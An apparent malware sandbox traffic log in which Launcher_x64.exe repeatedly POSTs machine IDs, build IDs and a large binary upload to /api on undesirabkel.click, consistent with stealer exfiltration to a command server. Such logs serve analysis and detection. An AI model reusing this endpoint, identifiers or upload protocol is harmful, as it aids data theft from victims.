                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8797
                                                                                        Host: undesirabkel.click
                                                                                        2024-12-31 16:37:17 UTC8797OUTData Raw: 2d 2d 39 38 58 41 39 45 42 58 32 57 4e 58 45 4e 4f 38 46 59 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 39 38 58 41 39 45 42 58 32 57 4e 58 45 4e 4f 38 46 59 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 38 58 41 39 45 42 58 32 57 4e 58 45 4e 4f 38 46 59 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77
                                                                                        Data Ascii: --98XA9EBX2WNXENO8FY8Content-Disposition: form-data; name="hwid"5D92490C56AFE01792A467F615F074C7--98XA9EBX2WNXENO8FY8Content-Disposition: form-data; name="pid"2--98XA9EBX2WNXENO8FY8Content-Disposition: form-data; name="lid"LPnhqo--sw
                                                                                        2024-12-31 16:37:17 UTC1138INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:37:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=grudnqjfstf1vuqilno7gognj5; expires=Sat, 26 Apr 2025 10:23:56 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BnH6m5H%2FUrtzaG8sifbjJ2oEtPPABvp7NfAloCAp6qZoSsocYaJN%2B5atJB3sOG2I%2BFeUL%2FYm4MfVij4u6YiiexFcMK6P3UvR9CVoVUE1tkxm39tdTs%2BR%2FBAW2H22NRBTBRgmt1I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb17dbf3e4303-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1611&rtt_var=632&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9739&delivery_rate=1692753&cwnd=219&unsent_bytes=0&cid=9df80dff9779af72&ts=775&x=0"
                                                                                        2024-12-31 16:37:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:37:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.449734188.114.97.34437372C:\Users\user\Desktop\Launcher_x64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:37:18 UTC277OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=D1YXNTJVU2N
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 20402
                                                                                        Host: undesirabkel.click
                                                                                        2024-12-31 16:37:18 UTC15331OUTData Raw: 2d 2d 44 31 59 58 4e 54 4a 56 55 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 44 31 59 58 4e 54 4a 56 55 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 31 59 58 4e 54 4a 56 55 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 0d 0a 2d 2d 44 31 59 58 4e 54 4a 56 55 32
                                                                                        Data Ascii: --D1YXNTJVU2NContent-Disposition: form-data; name="hwid"5D92490C56AFE01792A467F615F074C7--D1YXNTJVU2NContent-Disposition: form-data; name="pid"3--D1YXNTJVU2NContent-Disposition: form-data; name="lid"LPnhqo--swetamubcoyu--D1YXNTJVU2
                                                                                        2024-12-31 16:37:18 UTC5071OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                        2024-12-31 16:37:21 UTC1138INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:37:21 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=kln36a1nga9q93f05duvvbe4lr; expires=Sat, 26 Apr 2025 10:23:57 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2BxWIg2eQyn0RRSaZMqqm1uc%2FAtzhQ2b8wKvZikK94%2FZ%2FCryEamC5mVyTiqwCFJYg70Cn3OiLi1oBryTAEGcWbrmKIi%2BwEkgV6ezIpe9lCiw6xLv2ylG2v%2FvevDaQJFCvwJwbeQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb1864bc30f81-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1488&min_rtt=1486&rtt_var=562&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21359&delivery_rate=1936339&cwnd=239&unsent_bytes=0&cid=88a9413187186505&ts=3434&x=0"
                                                                                        2024-12-31 16:37:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:37:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.449735188.114.97.34437372C:\Users\user\Desktop\Launcher_x64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:37:22 UTC284OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=0OT5R9Y34Z1ZACQ1LYY
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1270
                                                                                        Host: undesirabkel.click
                                                                                        2024-12-31 16:37:22 UTC1270OUTData Raw: 2d 2d 30 4f 54 35 52 39 59 33 34 5a 31 5a 41 43 51 31 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 30 4f 54 35 52 39 59 33 34 5a 31 5a 41 43 51 31 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 4f 54 35 52 39 59 33 34 5a 31 5a 41 43 51 31 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77
                                                                                        Data Ascii: --0OT5R9Y34Z1ZACQ1LYYContent-Disposition: form-data; name="hwid"5D92490C56AFE01792A467F615F074C7--0OT5R9Y34Z1ZACQ1LYYContent-Disposition: form-data; name="pid"1--0OT5R9Y34Z1ZACQ1LYYContent-Disposition: form-data; name="lid"LPnhqo--sw
                                                                                        2024-12-31 16:37:25 UTC1127INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:37:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=35rr2oelre115adm8vcsbail14; expires=Sat, 26 Apr 2025 10:24:04 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILikjVTxfDvgPIVSCjln5OJlN1PBLgay9SMdAm1NEXndYfDWCAjaIIwyR7e2TkvbFG%2B2Dged1dLdvXYvGZSJdBBkKwWIgAkd7Yj3TLUIlXhBagfecCK5VLHLH2o84q%2Fv4fUmx94%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb1a23f740f97-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1645&rtt_var=658&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2190&delivery_rate=1613259&cwnd=245&unsent_bytes=0&cid=d2f1b1c2198ae3ac&ts=2535&x=0"
                                                                                        2024-12-31 16:37:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:37:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.449736188.114.97.34437372C:\Users\user\Desktop\Launcher_x64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:37:26 UTC276OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=NTCS7LIP3
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 584103
                                                                                        Host: undesirabkel.click
                                                                                        2024-12-31 16:37:26 UTC15331OUTData Raw: 2d 2d 4e 54 43 53 37 4c 49 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 4e 54 43 53 37 4c 49 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 54 43 53 37 4c 49 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 0d 0a 2d 2d 4e 54 43 53 37 4c 49 50 33 0d 0a 43 6f 6e 74 65
                                                                                        Data Ascii: --NTCS7LIP3Content-Disposition: form-data; name="hwid"5D92490C56AFE01792A467F615F074C7--NTCS7LIP3Content-Disposition: form-data; name="pid"1--NTCS7LIP3Content-Disposition: form-data; name="lid"LPnhqo--swetamubcoyu--NTCS7LIP3Conte
                                                                                        2024-12-31 16:37:26 UTC15331OUTData Raw: 77 57 e7 b0 2d 32 2a aa 92 b7 4d 66 b9 39 4d 74 eb 15 35 a9 c4 41 7b 9f d0 c5 2c 55 6c 44 45 fc 71 26 f0 3e 08 95 5d aa 99 29 bd c6 8f 1b 18 dc ca 2b 24 3e 86 bd d4 09 03 25 4a 95 08 fa f3 f4 46 43 6d cc d0 91 b3 93 da e1 7f 7d dc 27 6a 83 b9 dd d2 4f 70 e6 7f 5e 78 70 6a cd 7c 46 a6 ab ea 41 b6 3a 9a 3d ad 6e ca 7e ff 3e 15 a2 ef 30 15 b2 a1 af 9a 77 b0 a9 7a a2 1a 94 24 ed 09 29 bc 3b d3 d2 c5 79 26 bf 02 37 c8 df 03 6d 41 d5 d1 bd 09 a7 39 3b 66 0b 4d c2 dc 0f a5 ec c5 4d 33 86 5c dc 7c 94 bb 56 79 43 78 1b ce e7 af af d7 1c a4 9e 67 a7 cf fb c4 08 03 a0 17 41 b5 46 a5 d0 2c 8b c4 e8 3f c5 bb 57 4f fa 2d 7f 09 cf 01 3d c2 be b7 75 9f 80 9e 6a c0 0e de bd 9e 7c f0 93 eb 6a 4a 59 60 a7 9b 0a df 7d 36 ea 34 db 6c 6e 73 9d 77 92 22 4b a6 c2 5e 4c fe 59 83
                                                                                        Data Ascii: wW-2*Mf9Mt5A{,UlDEq&>])+$>%JFCm}'jOp^xpj|FA:=n~>0wz$);y&7mA9;fMM3\|VyCxgAF,?WO-=uj|jJY`}64lnsw"K^LY
                                                                                        2024-12-31 16:37:26 UTC15331OUTData Raw: 8f 61 ec 82 7a 4d 4b 72 6f bc a2 d8 28 b0 27 35 bd 6c 84 82 e7 47 e3 38 40 f1 53 31 d8 9f 37 53 da 7d e3 c9 61 82 4a 40 7a 17 53 6e 36 5b c7 d2 b9 ce da 08 25 ea 65 f1 3c 9a 83 41 b0 9b b2 36 94 f7 42 21 9a 3e b4 05 16 3d 0e 99 5d 6c 90 14 d4 75 3b ff 5e e9 82 df be 48 21 b5 d7 a9 34 c2 77 5a 66 06 9c c0 e7 0b 41 27 2f aa fe be c3 56 12 44 32 09 83 e8 26 bb cb 79 9c 2b 62 d8 cc 56 98 5f ec f5 7a 12 c0 37 69 7d 67 b3 fb ab 80 72 4d 25 56 73 cd ab eb 69 a8 9d cb c6 c0 63 58 99 d3 6d 06 dd 3a 8d 98 df cb e3 34 da 0a 51 f7 61 4e 4a 9e 27 75 30 22 bd 78 63 08 cf 23 be f1 88 ba 42 bc 0f 1d 2a c5 d9 e7 19 c0 f1 7b f3 0f 81 f2 7f 91 81 b1 39 5f 1c b5 f7 45 d7 0f 6f 97 de 94 8e 0a f7 9d ba 06 cc 44 64 96 1b 0b 72 2e e6 ba d8 c3 9c ac 8d b0 0e 8e f6 07 8e 69 0c 2b
                                                                                        Data Ascii: azMKro('5lG8@S17S}aJ@zSn6[%e<A6B!>=]lu;^H!4wZfA'/VD2&y+bV_z7i}grM%VsicXm:4QaNJ'u0"xc#B*{9_EoDdr.i+
                                                                                        2024-12-31 16:37:26 UTC15331OUTData Raw: 87 61 ac 8e 34 df df 30 49 34 06 2b 29 17 59 7f f4 0c fa 8f a5 0e cd 3c 0f 5f 81 72 90 c1 17 1d 88 5d 89 db d5 47 ee be 6a be 65 6d fc 88 61 d3 11 e4 01 04 21 e7 9e 73 76 05 8a bf 3b ab 96 06 6b 55 0a 38 a7 07 84 c8 be 9c a3 ec 31 14 08 cf 6e a9 95 c8 b8 fc 5f fc fe b8 73 c3 47 fa c2 97 4f de 17 2c 3a 07 b6 d8 cc 0b 9e af b9 3b 10 40 09 f0 da aa dc 83 ad ee be 60 7f 3e aa 5a 54 bb 54 00 1c 4a 20 b2 21 d7 79 69 13 b7 85 52 f9 6d 22 a5 b2 20 8f 45 f4 ab bb 13 15 2f 9c 52 e1 7b 7b 13 78 ce 97 99 10 4d 01 69 cb 30 b2 9f 1b de 4c a1 6f 44 de e1 9c 84 78 13 e0 91 4b 19 00 f9 9d 20 7e 37 f3 e5 f2 e8 79 82 e8 73 86 81 9e ba e4 7d 48 6d 1d 01 34 03 3c a0 10 17 cb 6a 1b 60 35 79 c1 a7 20 42 ee d3 a2 12 9e f4 94 c2 d3 75 f4 9f ea 5f 98 3b 2b 05 01 d4 e3 5f e7 0d 01
                                                                                        Data Ascii: a40I4+)Y<_r]Gjema!sv;kU81n_sGO,:;@`>ZTTJ !yiRm" E/R{{xMi0LoDxK ~7ys}Hm4<j`5y Bu_;+_
                                                                                        2024-12-31 16:37:26 UTC15331OUTData Raw: a3 a1 38 27 91 d7 de 3c a1 f0 5a d3 1a 8f 52 53 8a 8a 64 0f 08 d7 f3 e5 8a e0 14 fd 94 0e 72 73 a3 43 1c a1 57 b2 eb a4 95 cf 4b 6b 34 ac 58 52 73 ae a9 c8 6f 37 89 31 68 a8 ab ea 56 42 7d 67 e4 3d 31 8b bd 22 2e 13 7c a8 d6 4a 12 9c b8 d1 78 69 c7 5b 60 ce 71 6f 34 db 11 fa da 0f 9f ef af 9f d9 1c f9 d1 a7 27 c5 96 d7 68 a4 cd b4 ec d7 1e 8d 88 8d 49 63 f0 84 42 f1 f2 ae 5f ee 57 ae 96 a9 00 9a ab ca e0 f4 12 64 56 1d 6e 97 a3 a2 8a 9f 0f 6d 5f 59 f3 1b 6d db b0 ac 68 59 7b bd e9 16 17 59 b7 ae 76 90 27 51 45 65 a0 71 23 de e3 90 48 9a 21 17 b5 0d d8 9b e6 69 86 fe 1c 1d e5 b6 01 2d 08 fe fb 9e 8a c3 24 d3 0a 4e c8 8f 68 d1 e6 bb 83 ab de e9 24 87 bc 5a ae 0c a7 75 8a 27 f1 30 20 5e 20 b6 38 88 22 b4 85 e6 ac 41 7c 85 06 78 e7 2a 34 5a 60 1d 05 2f 35 4c
                                                                                        Data Ascii: 8'<ZRSdrsCWKk4XRso71hVB}g=1".|Jxi[`qo4'hIcB_WdVnm_YmhY{Yv'QEeq#H!i-$Nh$Zu'0 ^ 8"A|x*4Z`/5L
                                                                                        2024-12-31 16:37:26 UTC15331OUTData Raw: 55 78 10 71 98 69 d1 ad f2 3a 2d 47 62 53 4c 7a 3a a4 64 0b bb b5 37 65 c4 62 6f e6 0d 7c 59 83 89 cc 04 34 3f 7c 8f 11 b8 e8 2a 1f aa ef dc 5a 63 ec 89 11 39 53 85 c0 79 a9 e4 98 45 f1 d6 90 c7 a9 63 b3 c9 d5 0e 07 bc 26 fa d4 0a d3 0b 44 67 c8 48 f3 49 be ef 45 be 82 7d 31 5e ea 3a d9 bb 94 d5 31 aa 80 17 12 15 65 ae cd a7 16 62 fb fd 33 5d 6c 26 05 0e eb 34 7b fb 6e ed 13 4a 4e d8 9b a7 c3 e5 d3 4b 84 8c 3c 41 f1 a1 91 1d 20 73 e1 1c b3 81 71 e8 b2 47 ac 29 96 35 f5 b1 e0 53 65 17 e4 96 12 26 80 1c 61 47 fc 8a 7f 42 a4 11 b0 8b b9 3c 53 03 d3 40 8d 4a d8 e4 f4 4c 4e 33 0e ec 57 6b b7 87 1f 83 19 c5 ea ff 18 25 ad c1 93 ad 57 78 02 f7 02 16 54 e5 7b 91 48 f3 23 a7 2a 67 aa 87 0f bc d2 dd f5 d5 b9 77 ba 35 ad e4 ce 7f 74 88 ee 4a 31 09 07 8b d1 22 1c 47
                                                                                        Data Ascii: Uxqi:-GbSLz:d7ebo|Y4?|*Zc9SyEc&DgHIE}1^:1eb3]l&4{nJNK<A sqG)5Se&aGB<S@JLN3Wk%WxT{H#*gw5tJ1"G
                                                                                        2024-12-31 16:37:26 UTC15331OUTData Raw: fd 77 ab 8c 4b e7 ba fa ff be 72 b7 f4 5b ed 3f af ee 94 ed 2b 5d 9a d4 dd 4d e0 f6 b6 fe 5d c5 fd 33 bc 87 b0 b1 94 d6 8a 5d 7c a5 0c 7a d2 04 06 29 30 2c 22 60 52 b5 79 5d 14 a4 31 c0 62 dd f8 ef 43 20 1b 05 33 b5 33 b5 70 16 80 90 0d a1 10 08 71 b0 2e 0e e5 bc 1e 50 fb 75 1a c9 0b a5 e0 e4 96 d9 07 7b 0c 10 bc 70 51 fc f0 7e 42 d6 e6 c5 fe f4 8f 1a df 77 8a 98 a2 c3 61 f8 59 d3 e5 e5 ee ee ca 3f 0b 57 45 53 c3 d8 86 39 66 1f 62 58 de de 1b ee 2f 1e 41 a4 0c 2f fa 21 30 6b ed 2d 0c 44 04 b1 2d 92 db cd 11 79 cb eb 25 8f 9a 6f 5f 16 d5 c4 f3 52 6c ff d1 a5 87 17 3c f1 6d ff c0 ab f2 50 97 1c 2c 0f dd 29 05 41 18 f8 10 06 ff 6e 17 5e 00 f1 67 2a 3d 5b d0 66 ac ca 8f 8f 7e fc ed 78 ba 00 b8 f4 83 1d fb 03 14 b6 10 6b 2a 93 82 70 36 d6 93 9c 5b 33 b9 3c b5
                                                                                        Data Ascii: wKr[?+]M]3]|z)0,"`Ry]1bC 33pq.Pu{pQ~BwaY?WES9fbX/A/!0k-D-y%o_Rl<mP,)An^g*=[f~xk*p6[3<
                                                                                        2024-12-31 16:37:26 UTC15331OUTData Raw: 3f 3b 19 c4 0d 31 c2 8c 58 05 f1 9b 93 fc 60 84 6f 95 74 67 e2 e8 46 5f 46 ce 7f ae e5 77 19 c1 c5 ac 9b 77 0d e6 22 e6 95 ee 70 73 04 07 0b be ec 4e fb 61 72 df 6e c3 7b b1 b4 2d 4d 29 a5 35 b4 a6 c2 e5 d2 a5 cd 4d 36 8b 73 3f de 8c a3 cf 38 3a b7 6c 11 38 21 05 f7 5a 48 74 03 6a 8c c4 ff 82 c7 6c 70 39 f3 31 81 65 39 72 24 92 33 5b 3e e1 ea 32 38 53 be dc bd c2 41 2a 2a 86 94 b1 59 28 2d 2c 6d 32 e5 a9 7f c9 82 12 6e 4d 53 20 06 63 c9 47 e2 b3 2c 6d 22 48 12 b2 7e 11 ce 0d 20 f5 2a b6 76 58 54 b8 ff 5e 50 68 ad a4 1c 21 24 16 7d 63 c4 11 64 34 37 38 e7 80 cd d0 08 b4 eb 5a 2d cc fb 92 71 09 8b 8f 7f ff 58 10 1e 16 84 fe a4 d1 dd 83 3f 0b 31 56 fd 67 b6 26 fc 4f 55 f1 05 9f e9 09 68 ba f5 2d 6d e4 bf 2f 13 1b 9a ad 07 86 b8 23 c7 5e 81 c5 b1 11 86 cc c2
                                                                                        Data Ascii: ?;1X`otgF_Fww"psNarn{-M)5M6s?8:l8!ZHtjlp91e9r$3[>28SA**Y(-,m2nMS cG,m"H~ *vXT^Ph!$}cd478Z-qX?1Vg&OUh-m/#^
                                                                                        2024-12-31 16:37:26 UTC15331OUTData Raw: ea 8c ae 5e 74 4b 0c c2 74 05 7d ad 61 82 95 dd 33 36 f5 f6 6d eb 8e a7 7e fd a9 ab fd 7b 5b 90 5d fe 02 8f 28 3a f2 66 42 c8 bb 11 94 d7 a5 d1 49 cb 37 c2 e0 24 b4 57 6b da e8 b3 ea 14 a1 80 85 6f 19 94 99 85 5d 98 1a 27 f2 4d d4 2e d4 b7 55 9a 1c 61 d9 9f 7a 0d 78 fd 48 d8 1f c1 cf 31 40 37 17 5a 46 31 38 65 79 68 17 be fc 04 35 8f 8d 81 7c 2a 91 4d 8a ae ba 8b b6 a3 67 1b 01 1c 56 6a 1b 29 b6 3b 65 17 4f b5 55 70 b4 04 6b 80 85 7e ad bf 78 e5 b2 9f 76 74 dd ed 21 32 2c df 00 61 f0 78 21 c5 cb 6f 55 94 ef 35 d8 eb ce ec 5a 7b a1 2a f4 d8 58 e7 7e 54 fa 05 d6 11 a4 ea ac 06 3e 75 dd 36 6f e3 99 1f de a6 9b 1f a7 7a 3e 8f a5 78 f8 bd 2b a0 65 e0 0c 16 c7 47 36 4e f0 5b 7f 0c a3 75 49 98 7c ff 26 d6 ca ee 8c 26 94 f1 f9 ac eb eb f1 08 93 a6 68 e6 a3 e6 5c
                                                                                        Data Ascii: ^tKt}a36m~{[](:fBI7$Wko]'M.UazxH1@7ZF18eyh5|*MgVj);eOUpk~xvt!2,ax!oU5Z{*X~T>u6oz>x+eG6N[uI|&&h\
                                                                                        2024-12-31 16:37:26 UTC15331OUTData Raw: ef 74 8a 3a 54 f5 8d 5c 02 59 56 ca 60 66 eb 8c a1 8d ea 29 32 32 cd a1 8d 8a 1a e5 b9 66 c2 9c 56 37 ed fc b3 df fa 92 50 6d 12 c5 69 32 82 52 86 79 25 e2 90 77 99 5c 1b 26 0b 6d 91 f9 54 29 04 44 ec 8a 02 09 47 59 9c 75 ff 31 22 bb 2f a6 3d b4 14 d7 5c 17 90 ff 8a 81 ce d9 a5 58 fe ef 38 29 fb a3 d2 da 37 39 da b7 e5 d3 03 6c 11 e5 08 06 79 fe d7 45 5c 61 b2 15 b3 c6 bb 1f a5 ba a7 3f a4 48 ba 4f 77 6a 99 e5 50 97 15 69 5f fb 4e a5 9c c0 fa 91 99 52 5a 74 9e d8 f4 ad bc 5b 39 ac d0 4f 5b b2 ff 9d 30 73 62 7e 3b 20 39 c5 86 e2 be 5a 9c 0a 1f f8 d7 cb 60 cf f2 87 ba d9 17 b3 91 ef a5 1b bd c2 5f 2e 56 eb cd b8 2b cf 5a fe 83 3e fb 0f da 35 42 6a b6 5a b4 63 ed 1b ab 6f a6 34 ed 63 5f c0 13 e9 c2 bc e9 98 63 b7 4e ba 04 ed 75 3b af 68 25 d0 01 6e da 65 68
                                                                                        Data Ascii: t:T\YV`f)22fV7Pmi2Ry%w\&mT)DGYu1"/=\X8)79lyE\a?HOwjPi_NRZt[9O[0sb~; 9Z`_.V+Z>5BjZco4c_cNu;h%neh
                                                                                        2024-12-31 16:37:28 UTC1139INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:37:28 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
